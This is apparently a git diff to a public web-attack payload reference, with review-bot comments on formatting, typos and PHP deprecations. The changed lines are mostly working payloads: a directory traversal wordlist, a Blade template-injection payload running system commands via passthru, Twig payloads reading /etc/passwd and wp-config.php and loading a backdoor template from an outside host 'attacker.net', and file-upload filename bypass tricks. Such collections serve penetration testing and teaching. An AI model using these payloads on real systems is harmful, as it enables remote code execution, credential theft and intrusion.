diff --git a/Directory Traversal/Intruder/traversals-8-deep-exotic-encoding.txt b/Directory Traversal/Intruder/traversals-8-deep-exotic-encoding.txt index 5fbaded549..05ea1a92c5 100644 --- a/Directory Traversal/Intruder/traversals-8-deep-exotic-encoding.txt +++ b/Directory Traversal/Intruder/traversals-8-deep-exotic-encoding.txt @@ -877,11 +877,11 @@ /..\..\\..\..\\..\..\\\{FILE} /..\..\\..\..\\..\..\\..\\\{FILE} /..\..\\..\..\\..\..\\..\..\\\{FILE} -/\..%2f -/\..%2f\..%2f -/\..%2f\..%2f\..%2f -/\..%2f\..%2f\..%2f\..%2f -/\..%2f\..%2f\..%2f\..%2f\..%2f -/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f -/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f +/\..%2f{FILE} +/\..%2f\..%2f{FILE} +/\..%2f\..%2f\..%2f{FILE} +/\..%2f\..%2f\..%2f\..%2f{FILE} +/\..%2f\..%2f\..%2f\..%2f\..%2f{FILE} +/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f{FILE} +/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f{FILE} /\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f{FILE} diff --git a/GraphQL Injection/README.md b/GraphQL Injection/README.md index 4e69a37baa..0192f55adf 100644 --- a/GraphQL Injection/README.md +++ b/GraphQL Injection/README.md @@ -38,6 +38,7 @@ - [nicholasaleks/CrackQL](https://github.com/nicholasaleks/CrackQL) - A GraphQL password brute-force and fuzzing utility - [nicholasaleks/graphql-threat-matrix](https://github.com/nicholasaleks/graphql-threat-matrix) - GraphQL threat framework used by security professionals to research security gaps in GraphQL implementations - [dolevf/graphql-cop](https://github.com/dolevf/graphql-cop) - Security Auditor Utility for GraphQL APIs +- [dolevf/graphw00f](https://github.com/dolevf/graphw00f) - GraphQL Server Engine Fingerprinting utility - [IvanGoncharov/graphql-voyager](https://github.com/IvanGoncharov/graphql-voyager) - Represent any GraphQL API as an interactive graph - [Insomnia](https://insomnia.rest/) - Cross-platform HTTP and GraphQL Client 
diff --git a/Server Side Template Injection/PHP.md b/Server Side Template Injection/PHP.md index f8502ad68a..cc3618c315 100644 --- a/Server Side Template Injection/PHP.md +++ b/Server Side Template Injection/PHP.md @@ -21,21 +21,34 @@ ## Templating Libraries -| Template Name | Payload Format | -| -------------- | --------- | -| Laravel Blade | `{{ }}` | -| Latte | `{var $X=""}{$X}` | -| Mustache | `{{ }}` | -| Plates | `` | -| Smarty | `{ }` | -| Twig | `{{ }}` | +| Template Name | Payload Format | +| --------------- | --------- | +| Blade (Laravel) | `{{ }}` | +| Latte | `{var $X=""}{$X}` | +| Mustache | `{{ }}` | +| Plates | `` | +| Smarty | `{ }` | +| Twig | `{{ }}` | + +## Blade + +[Official website](https://laravel.com/docs/master/blade) +> Blade is the simple, yet powerful templating engine that is included with Laravel. + +The string `id` is generated with `{{implode(null,array_map(chr(99).chr(104).chr(114),[105,100]))}}`. + +```php +{{passthru(implode(null,array_map(chr(99).chr(104).chr(114),[105,100])))}} +``` + +--- ## Smarty [Official website](https://www.smarty.net/docs/en/) > Smarty is a template engine for PHP. -```python +```php {$smarty.version} {php}echo `id`;{/php} //deprecated in smarty v3 {Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"",self::clearConfig())} @@ -52,7 +65,7 @@ ### Twig - Basic Injection -```python +```php {{7*7}} {{7*'7'}} would result in 49 {{dump(app)}} @@ -62,7 +75,7 @@ ### Twig - Template Format -```python +```php $output = $twig > render ( 'Dear' . $_GET['custom_greeting'], array("first_name" => $user.first_name) @@ -76,14 +89,14 @@ $output = $twig > render ( ### Twig - Arbitrary File Reading -```python +```php "{{'/etc/passwd'|file_excerpt(1,30)}}"@ {{include("wp-config.php")}} ``` ### Twig - Code Execution -```python +```php {{self}} {{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}} {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} 
@@ -249,4 +262,5 @@ layout template: ## References +- [Limitations are just an illusion – advanced server-side template exploitation with RCE everywhere- YesWeHack - March 24, 2025](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation) - [Server Side Template Injection (SSTI) via Twig escape handler - March 21, 2024](https://github.com/getgrav/grav/security/advisories/GHSA-2m7x-c7px-hp58) diff --git a/Server Side Template Injection/Python.md b/Server Side Template Injection/Python.md index 87137471de..056d605710 100644 --- a/Server Side Template Injection/Python.md +++ b/Server Side Template Injection/Python.md @@ -406,3 +406,4 @@ PoC : - [Exploring SSTI in Flask/Jinja2, Part II - Tim Tomes - March 11, 2016](https://web.archive.org/web/20170710015954/https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/) - [Jinja2 template injection filter bypasses - Sebastian Neef - August 28, 2017](https://0day.work/jinja2-template-injection-filter-bypasses/) - [Python context free payloads in Mako templates - podalirius - August 26, 2021](https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/) +- [The minefield between syntaxes: exploiting syntax confusions in the wild - YesWeHack - October 17, 2025](https://www.yeswehack.com/learn-bug-bounty/syntax-confusion-ambiguous-parsing-exploits) diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md index 2047d0c3c6..75f5aa94b2 100644 --- a/Upload Insecure Files/README.md +++ b/Upload Insecure Files/README.md 
@@ -102,6 +102,7 @@ Other extensions that can be abused to trigger other vulnerabilities. * Right to Left Override (RTLO): `name.%E2%80%AEphp.jpg` will became `name.gpj.php`. * Slash: `file.php/`, `file.php.\`, `file.j\sp`, `file.j/sp` * Multiple special characters: `file.jsp/././././.` + * UTF8 filename: `Content-Disposition: form-data; name="anyBodyParam"; filename*=UTF8''myfile%0a.txt` * On Windows OS, `include`, `require` and `require_once` functions will convert "foo.php" followed by one or more of the chars `\x20` ( ), `\x22` ("), `\x2E` (.), `\x3C` (<), `\x3E` (>) back to "foo.php". * On Windows OS, `fopen` function will convert "foo.php" followed by one or more of the chars `\x2E` (.), `\x2F` (/), `\x5C` (\) back to "foo.php". diff --git a/XXE Injection/README.md b/XXE Injection/README.md index 6c02302290..eb642671e9 100644 --- a/XXE Injection/README.md +++ b/XXE Injection/README.md @@ -68,6 +68,13 @@ Basic entity test, when the XML parser parses the external entities the result s It might help to set the `Content-Type: application/xml` in the request when sending XML payload to the server. +These are different types of entities in XML: + +| Type | Prefix | Where usable | +| ---------------- | -------- | --------------------------- | +| General entity | `&name;` | Inside XML document content | +| Parameter entity | `%name;` | Only inside the DTD | + ## Exploiting XXE to Retrieve Files ### Classic XXE @@ -155,7 +162,7 @@ XXE can be combined with the [SSRF vulnerability](https://github.com/swisskyrepo - + ]> &xxe; ``` diff --git a/_LEARNING_AND_SOCIALS/YOUTUBE.md b/_LEARNING_AND_SOCIALS/YOUTUBE.md index c6223bf879..7fea856c17 100644 --- a/_LEARNING_AND_SOCIALS/YOUTUBE.md +++ b/_LEARNING_AND_SOCIALS/YOUTUBE.md 
@@ -19,6 +19,7 @@ - [Jack Rhysider - Darknet Diaries](https://www.youtube.com/@JackRhysider) - [John Hammond - Wargames and CTF writeups](https://www.youtube.com/channel/UCVeW9qkBjo3zosnqUbG7CFw) - [Laluka - OffenSkill - Sharing is Caring](https://www.youtube.com/@TheLaluka) +- [LaurieWired - reverse engineering and research](https://www.youtube.com/@lauriewired) - [LiveOverflow - Explore weird machines...](https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w) - [Murmus CTF - Weekly live streamings](https://www.youtube.com/channel/UCUB9vOGEUpw7IKJRoR4PK-A) - [Nahamsec](https://www.youtube.com/c/Nahamsec) @@ -30,6 +31,7 @@ - [STÖK](https://www.youtube.com/c/STOKfredrik) - [The Cyber Mentor](https://www.youtube.com/channel/UC0ArlFuFYMpEewyRBzdLHiw) - [The Hated one](https://www.youtube.com/channel/UCjr2bPAyPV7t35MvcgT3W8Q) +- [Tib3rius - CTF walkthroughs, deep dives, web app hacking, and more!](https://www.youtube.com/@tib3rius) - [xct hacks](https://www.youtube.com/@xct_de) ## Conferences
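Review bot: In the traversals-8-deep-exotic-encoding.txt hunk, the seven rewritten lines now carry the `{FILE}` placeholder like the eighth line that follows them, which is the right fix; before merging, grep the rest of the file for lines still lacking `{FILE}`, since a wordlist that mixes suffixed and unsuffixed entries produces a second, unintended payload shape in Intruder output.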
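Review bot: In the PHP.md Blade hunk (`@@ -21,21 +21,34 @@`), `implode(null, array_map(...))` passes a null separator, which PHP 8.1 and later report as a deprecation (passing null to a non-nullable string parameter); `implode('', ...)` or the single-argument `implode(array)` form is equivalent and warning-free. The lead-in sentence states how the string `id` is assembled from `chr()` calls but not why, so a reader cannot tell that the point is building the string without quote characters; add that one clause.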
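Review bot: In the Twig - Basic Injection hunk (`@@ -52,7 +65,7 @@`), switching the fence from `python` to `php` is an improvement, but the block body (`{{7*7}}`, `{{dump(app)}}`) is Twig template syntax rather than PHP, so the `twig` fence tag, which GitHub highlights, matches the content better; the same applies to the Arbitrary File Reading and Code Execution fences changed later in this file.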
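Review bot: The context line `$output = $twig > render (` in the Twig - Template Format hunk (`@@ -62,7 +75,7 @@`, and repeated in the next hunk's header) is missing the `-` of the `->` method call, so the block is not valid PHP even after the fence tag is corrected; change it to `$output = $twig->render(` in this commit.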
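Review bot: In the Twig - Arbitrary File Reading hunk (`@@ -76,14 +89,14 @@`), the first payload line ends in `"@` after the closing `}}`, which does not belong to the Twig expression and reads like a stray suffix from copy-paste; confirm it is intentional or drop it while the block is being touched.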
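Review bot: The added reference in PHP.md (`@@ -249,4 +262,5 @@`) is missing the space before the hyphen in `RCE everywhere- YesWeHack`; the other entries use the `title - source - date` form with spaces on both sides, so it should read `RCE everywhere - YesWeHack`.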
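Review bot: The added bullet in the Upload Insecure Files hunk (`@@ -102,6 +102,7 @@`) spells the charset `UTF8`; the RFC 5987 / RFC 6266 extended-parameter form is `filename*=UTF-8''...` with a hyphen, and a parser following the spec may not decode the bare `UTF8` token at all, so either use `UTF-8` or say explicitly that the non-standard spelling is the point. The bullet also does not explain what `%0a` contributes (a percent-encoded newline that survives into the decoded filename), whereas the neighbouring bullets each say what their trick produces; add that. While here, the context line `will became` should read `will become`.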
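Review bot: The entity table added in the XXE hunk (`@@ -68,6 +68,13 @@`) shows the reference syntax (`&name;`, `%name;`) but not the declaration syntax, which is what actually distinguishes the two kinds in a DTD; a third column or a sentence below the table with `<!ENTITY name "value">` versus `<!ENTITY % name "value">` would make the "Only inside the DTD" row self-explanatory. The lead-in "These are different types of entities in XML:" would read better as "XML has two kinds of entities:".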